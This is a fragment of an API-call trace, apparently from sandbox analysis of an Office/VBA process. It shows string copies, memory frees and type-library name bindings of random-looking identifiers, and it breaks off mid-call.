[0061.058] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55722e2 | out: _Dst=0x87fcc50) returned 0x0 [0061.058] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55722e2 | out: _Dst=0x343ddc) returned 0x0 [0061.058] CRetailMalloc_Free () returned 0x7940201 [0061.058] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5572306 | out: _Dst=0x87fcc50) returned 0x0 [0061.058] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5572306 | out: _Dst=0x343ddc) returned 0x0 [0061.058] CRetailMalloc_Free () returned 0x7940201 [0061.060] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x557232a | out: _Dst=0x87fcc50) returned 0x0 [0061.060] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557232a | out: _Dst=0x343ddc) returned 0x0 [0061.060] CRetailMalloc_Free () returned 0x7940201 [0061.060] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5572372 | out: _Dst=0x87fcc50) returned 0x0 [0061.060] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5572372 | out: _Dst=0x343ddc) returned 0x0 [0061.060] CRetailMalloc_Free () returned 0x7940201 [0061.061] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x557234e | out: _Dst=0x87fcc50) returned 0x0 [0061.061] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557234e | out: _Dst=0x343ddc) returned 0x0 [0061.061] CRetailMalloc_Free () returned 0x7940201 [0061.061] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.061] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5572396 | out: _Dst=0x87fcc50) returned 0x0 [0061.062] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5572396 | out: _Dst=0x343ddc) returned 0x0 [0061.062] CRetailMalloc_Free () returned 0x7940201 [0061.062] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55723ba | out: _Dst=0x87fcc50) returned 0x0 [0061.062] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55723ba | out: _Dst=0x343ddc) returned 0x0 [0061.062] CRetailMalloc_Free () returned 0x7940201 [0061.062] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55723de | out: _Dst=0x87fcc50) returned 0x0 [0061.062] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55723de | out: _Dst=0x343ddc) returned 0x0 [0061.063] CRetailMalloc_Free () returned 0x7940201 [0061.063] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5572406 | out: _Dst=0x87fcc50) returned 0x0 [0061.063] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5572406 | out: _Dst=0x343ddc) returned 0x0 [0061.063] CRetailMalloc_Free () returned 0x7940201 [0061.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557242a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="e5IUNlg") returned 8 [0061.063] ITypeComp:RemoteBind (in: This=0x87ce890, szName="e5IUNlg", lHashVal=0x10c9ee, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x720 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x720) returned 0x0 [0061.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557242a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="e5IUNlg") returned 8 [0061.063] ITypeComp:RemoteBind (in: This=0x87ce668, szName="e5IUNlg", lHashVal=0x10c9ee, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x720 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x720) returned 0x0 [0061.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557242a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="e5IUNlg") returned 8 [0061.064] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="e5IUNlg", lHashVal=0x10c9ee, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x720 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x720) returned 0x0 [0061.064] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557242a | out: _Dst=0x87fcc50) returned 0x0 [0061.064] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557242a | out: _Dst=0x343ddc) returned 0x0 [0061.064] CRetailMalloc_Free () returned 0x7940201 [0061.064] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557244e | out: _Dst=0x87fcc50) returned 0x0 [0061.065] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557244e | out: _Dst=0x343ddc) returned 0x0 [0061.065] CRetailMalloc_Free () returned 0x7940201 [0061.065] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5572496 | out: _Dst=0x87fcc50) returned 0x0 [0061.065] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5572496 | out: _Dst=0x343ddc) returned 0x0 [0061.065] CRetailMalloc_Free () returned 0x7940201 [0061.065] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5572472 | out: _Dst=0x87fcc50) returned 0x0 [0061.066] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5572472 | out: _Dst=0x343ddc) returned 0x0 [0061.066] CRetailMalloc_Free () returned 0x7940201 [0061.066] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55724be | out: _Dst=0x87fcc50) returned 0x0 [0061.066] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55724be | out: _Dst=0x343ddc) returned 0x0 [0061.066] CRetailMalloc_Free () returned 0x7940201 [0061.066] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x55724e2 | out: _Dst=0x87fcc50) returned 0x0 [0061.067] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x55724e2 | out: _Dst=0x343ddc) returned 0x0 [0061.067] CRetailMalloc_Free () returned 0x7940201 [0061.067] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5572506 | out: _Dst=0x87fcc50) returned 0x0 [0061.067] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5572506 | out: _Dst=0x343ddc) returned 0x0 [0061.067] CRetailMalloc_Free () returned 0x7940201 [0061.068] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557252a | out: _Dst=0x87fcc50) returned 0x0 [0061.068] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557252a | out: _Dst=0x343ddc) returned 0x0 [0061.068] CRetailMalloc_Free () returned 0x7940201 [0061.068] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5572552 | out: _Dst=0x87fcc50) returned 0x0 [0061.068] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5572552 | out: _Dst=0x343ddc) returned 0x0 [0061.068] CRetailMalloc_Free () returned 0x7940201 [0061.069] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5572576 | out: _Dst=0x87504e0) returned 0x0 [0061.069] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5572576 | out: _Dst=0x343ddc) returned 0x0 [0061.069] CRetailMalloc_Free () returned 0x1a060101 [0061.069] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557259e | out: _Dst=0x87fcc50) returned 0x0 [0061.069] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557259e | out: _Dst=0x343ddc) returned 0x0 [0061.069] CRetailMalloc_Free () returned 0x7940201 [0061.070] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55725c6 | out: _Dst=0x87fcc50) returned 0x0 [0061.070] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55725c6 | out: _Dst=0x343ddc) returned 0x0 [0061.070] CRetailMalloc_Free () returned 0x7940201 [0061.070] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55725ea | out: _Dst=0x87fcc50) returned 0x0 [0061.070] CRetailMalloc_Free () returned 0x7940201 [0061.070] CRetailMalloc_Free () returned 0x7940201 [0061.071] CRetailMalloc_Free () returned 0x7940201 [0061.071] CRetailMalloc_Free () returned 0x7940201 [0061.071] CRetailMalloc_Free () returned 0x1a060101 [0061.071] CRetailMalloc_Free () returned 0x7940201 [0061.071] CRetailMalloc_Free () returned 0x7940201 [0061.072] CRetailMalloc_Free () returned 0x7940201 [0061.072] CRetailMalloc_Realloc () returned 0x6220eb8 [0061.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5572736, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="laIYudf") returned 8 [0061.073] ITypeComp:RemoteBind (in: This=0x87cef08, szName="laIYudf", lHashVal=0x10a571, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x74a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x74a) returned 0x0 [0061.073] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.073] CRetailMalloc_Free () returned 0x7940201 [0061.073] CRetailMalloc_Free () returned 0x1a060101 [0061.073] CRetailMalloc_Free () returned 0x7940201 [0061.074] CRetailMalloc_Free () returned 0x7940201 [0061.074] CRetailMalloc_Free () returned 0x7940201 [0061.074] CRetailMalloc_Free () returned 0x7940201 [0061.074] CRetailMalloc_Free () returned 0x1a060101 [0061.074] CRetailMalloc_Free () returned 0x7940201 [0061.075] CRetailMalloc_Free () returned 0x7940201 [0061.075] CRetailMalloc_Free () returned 0x7940201 [0061.075] CRetailMalloc_Free () returned 0x7940201 [0061.075] CRetailMalloc_Free () returned 0x7940201 [0061.075] CRetailMalloc_Free () returned 0x7940201 [0061.076] CRetailMalloc_Free () returned 0x7940201 [0061.076] CRetailMalloc_Free () returned 0x7940201 [0061.076] CRetailMalloc_Free () returned 0x7940201 [0061.076] CRetailMalloc_Free () returned 0x7940201 [0061.076] CRetailMalloc_Free () returned 0x7940201 [0061.076] CRetailMalloc_Free () returned 0x7940201 [0061.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55729fa, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="rGd91") returned 6 [0061.077] ITypeComp:RemoteBind (in: This=0x87ce890, szName="rGd91", lHashVal=0x107778, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x770 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x770) returned 0x0 [0061.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55729fa, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="rGd91") returned 6 [0061.077] ITypeComp:RemoteBind (in: This=0x87ce668, szName="rGd91", lHashVal=0x107778, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x770 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x770) returned 0x0 [0061.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55729fa, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="rGd91") returned 6 [0061.077] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="rGd91", lHashVal=0x107778, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x770 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x770) returned 0x0 [0061.077] CRetailMalloc_Free () returned 0x7940201 [0061.077] CRetailMalloc_Free () returned 0x7940201 [0061.078] CRetailMalloc_Free () returned 0x1a060101 [0061.078] CRetailMalloc_Free () returned 0x7940201 [0061.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5572a6a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="mV5NomG") returned 8 [0061.078] ITypeComp:RemoteBind (in: This=0x87ce890, szName="mV5NomG", lHashVal=0x10cd49, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x776 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x776) returned 0x0 [0061.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5572a6a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="mV5NomG") returned 8 [0061.078] ITypeComp:RemoteBind (in: This=0x87ce668, szName="mV5NomG", lHashVal=0x10cd49, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x776 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x776) returned 0x0 [0061.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5572a6a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="mV5NomG") returned 8 [0061.078] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="mV5NomG", lHashVal=0x10cd49, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x776 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x776) returned 0x0 [0061.079] CRetailMalloc_Free () returned 0x7940201 [0061.079] CRetailMalloc_Free () returned 0x7940201 [0061.079] CRetailMalloc_Free () returned 0x1a060101 [0061.079] CRetailMalloc_Free () returned 0x7940201 [0061.079] CRetailMalloc_Free () returned 0x7940201 [0061.080] CRetailMalloc_Free () returned 0x1a060101 [0061.080] CRetailMalloc_Free () returned 0x7940201 [0061.080] CRetailMalloc_Free () returned 0x7940201 [0061.080] CRetailMalloc_Free () returned 0x7940201 [0061.080] CRetailMalloc_Free () returned 0x7940201 [0061.080] CRetailMalloc_Free () returned 0x7940201 [0061.081] CRetailMalloc_Free () returned 0x7940201 [0061.081] CRetailMalloc_Free () returned 0x7940201 [0061.081] CRetailMalloc_Free () returned 0x7940201 [0061.081] CRetailMalloc_Free () returned 0x1a060101 [0061.081] CRetailMalloc_Free () returned 0x7940201 [0061.082] CRetailMalloc_Free () returned 0x7940201 [0061.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5572cf2, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="xtzZW") returned 6 [0061.082] ITypeComp:RemoteBind (in: This=0x87ce890, szName="xtzZW", lHashVal=0x10671d, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x798 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x798) returned 0x0 [0061.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5572cf2, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="xtzZW") returned 6 [0061.082] ITypeComp:RemoteBind (in: This=0x87ce668, szName="xtzZW", lHashVal=0x10671d, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x798 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x798) returned 0x0 [0061.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5572cf2, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="xtzZW") returned 6 [0061.082] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="xtzZW", lHashVal=0x10671d, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x798 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x798) returned 0x0 [0061.082] CRetailMalloc_Free () returned 0x7940201 [0061.082] CRetailMalloc_Free () returned 0x7940201 [0061.083] CRetailMalloc_Free () returned 0x7940201 [0061.083] CRetailMalloc_Free () returned 0x7940201 [0061.083] CRetailMalloc_Free () returned 0x1a060101 [0061.083] CRetailMalloc_Free () returned 0x1a060101 [0061.083] CRetailMalloc_Free () returned 0x7940201 [0061.084] CRetailMalloc_Free () returned 0x7940201 [0061.084] CRetailMalloc_Free () returned 0x7940201 [0061.084] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xacf0ff6, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_zowDMyLJ") returned 16 [0061.084] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_zowDMyLJ", lHashVal=0x10ee3a, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.084] CRetailMalloc_Free () returned 0x7940201 [0061.085] CRetailMalloc_Free () returned 0x1a060101 [0061.085] CRetailMalloc_Free () returned 0x7940201 [0061.085] CRetailMalloc_Free () returned 0x7940201 [0061.085] CRetailMalloc_Free () returned 0x7940201 [0061.085] CRetailMalloc_Free () returned 0x7940201 [0061.085] CRetailMalloc_Free () returned 0x7940201 [0061.086] CRetailMalloc_Free () returned 0x7940201 [0061.086] CRetailMalloc_Free () returned 0x7940201 [0061.086] CRetailMalloc_Free () returned 0x7940201 [0061.086] CRetailMalloc_Free () returned 0x7940201 [0061.086] CRetailMalloc_Free () returned 0x7940201 [0061.087] CRetailMalloc_Free () returned 0x7940201 [0061.087] CRetailMalloc_Free () returned 0x7940201 [0061.087] CRetailMalloc_Free () returned 0x7940201 [0061.087] CRetailMalloc_Free () returned 0x7940201 [0061.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b00ae, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="wiuhZ6xH") returned 9 [0061.087] ITypeComp:RemoteBind (in: This=0x87ce890, szName="wiuhZ6xH", lHashVal=0x103ba4, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x7ca | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x7ca) returned 0x0 [0061.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b00ae, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="wiuhZ6xH") returned 9 [0061.088] ITypeComp:RemoteBind (in: This=0x87ce668, szName="wiuhZ6xH", lHashVal=0x103ba4, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x7ca | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x7ca) returned 0x0 [0061.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b00ae, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="wiuhZ6xH") returned 9 [0061.088] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="wiuhZ6xH", lHashVal=0x103ba4, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x7ca | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x7ca) returned 0x0 [0061.088] CRetailMalloc_Free () returned 0x7940201 [0061.088] CRetailMalloc_Free () returned 0x7940201 [0061.089] CRetailMalloc_Free () returned 0x7940201 [0061.089] CRetailMalloc_Free () returned 0x7940201 [0061.089] CRetailMalloc_Free () returned 0x7940201 [0061.089] CRetailMalloc_Free () returned 0x7940201 [0061.089] CRetailMalloc_Free () returned 0x1a060101 [0061.090] CRetailMalloc_Free () returned 0x7940201 [0061.090] CRetailMalloc_Free () returned 0x7940201 [0061.091] CRetailMalloc_Free () returned 0x1a060101 [0061.091] CRetailMalloc_Free () returned 0x7940201 [0061.092] CRetailMalloc_Free () returned 0x7940201 [0061.092] CRetailMalloc_Free () returned 0x7940201 [0061.092] CRetailMalloc_Free () returned 0x7940201 [0061.092] CRetailMalloc_Free () returned 0x1a060101 [0061.092] CRetailMalloc_Free () returned 0x1a060101 [0061.093] CRetailMalloc_Free () returned 0x7940201 [0061.093] CRetailMalloc_Free () returned 0x1a060101 [0061.093] CRetailMalloc_Free () returned 0x7940201 [0061.093] CRetailMalloc_Free () returned 0x7940201 [0061.093] CRetailMalloc_Free () returned 0x7940201 [0061.093] CRetailMalloc_Free () returned 0x7940201 [0061.094] CRetailMalloc_Free () returned 0x1a060101 [0061.094] CRetailMalloc_Free () returned 0x7940201 [0061.094] CRetailMalloc_Free () returned 0x7940201 [0061.094] CRetailMalloc_Free () returned 0x7940201 [0061.094] CRetailMalloc_Free () returned 0x1a060101 [0061.095] CRetailMalloc_Free () returned 0x7940201 [0061.095] CRetailMalloc_Free () returned 0x7940201 [0061.095] CRetailMalloc_Free () returned 0x1a060101 [0061.095] CRetailMalloc_Realloc () returned 0x880a7c0 [0061.095] CRetailMalloc_Free () returned 0x7940201 [0061.095] CRetailMalloc_Free () returned 0x7940201 [0061.096] CRetailMalloc_Free () returned 0x7940201 [0061.096] CRetailMalloc_Free () returned 0x7940201 [0061.096] CRetailMalloc_Free () returned 0x7940201 [0061.096] CRetailMalloc_Free () returned 0x7940201 [0061.096] CRetailMalloc_Free () returned 0x7940201 [0061.097] CRetailMalloc_Free () returned 0x7940201 [0061.097] CRetailMalloc_Free () returned 0x7940201 [0061.097] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.097] CRetailMalloc_Free () returned 0x7940201 [0061.097] CRetailMalloc_Free () returned 0x7940201 [0061.098] CRetailMalloc_Free () returned 0x1a060101 [0061.098] CRetailMalloc_Free () returned 0x7940201 [0061.098] CRetailMalloc_Free () returned 0x7940201 [0061.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b074a, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="FG5ad7q2") returned 9 [0061.098] ITypeComp:RemoteBind (in: This=0x87cef08, szName="FG5ad7q2", lHashVal=0x100494, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x824 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x824) returned 0x0 [0061.098] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.098] CRetailMalloc_Free () returned 0x7940201 [0061.099] CRetailMalloc_Free () returned 0x7940201 [0061.099] CRetailMalloc_Free () returned 0x7940201 [0061.099] CRetailMalloc_Free () returned 0x7940201 [0061.099] CRetailMalloc_Free () returned 0x7940201 [0061.099] CRetailMalloc_Free () returned 0x7940201 [0061.100] CRetailMalloc_Free () returned 0x7940201 [0061.100] CRetailMalloc_Free () returned 0x1a060101 [0061.102] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xacf2006, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_JbFHhp") returned 14 [0061.102] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_JbFHhp", lHashVal=0x1031e5, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b0cb2, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="bR5onNk") returned 8 [0061.103] ITypeComp:RemoteBind (in: This=0x87ce890, szName="bR5onNk", lHashVal=0x108ce8, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x86e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x86e) returned 0x0 [0061.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b0cb2, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="bR5onNk") returned 8 [0061.103] ITypeComp:RemoteBind (in: This=0x87ce668, szName="bR5onNk", lHashVal=0x108ce8, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x86e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x86e) returned 0x0 [0061.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b0cb2, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="bR5onNk") returned 8 [0061.104] ITypeComp:RemoteBind (in: This=0x87ceab8, 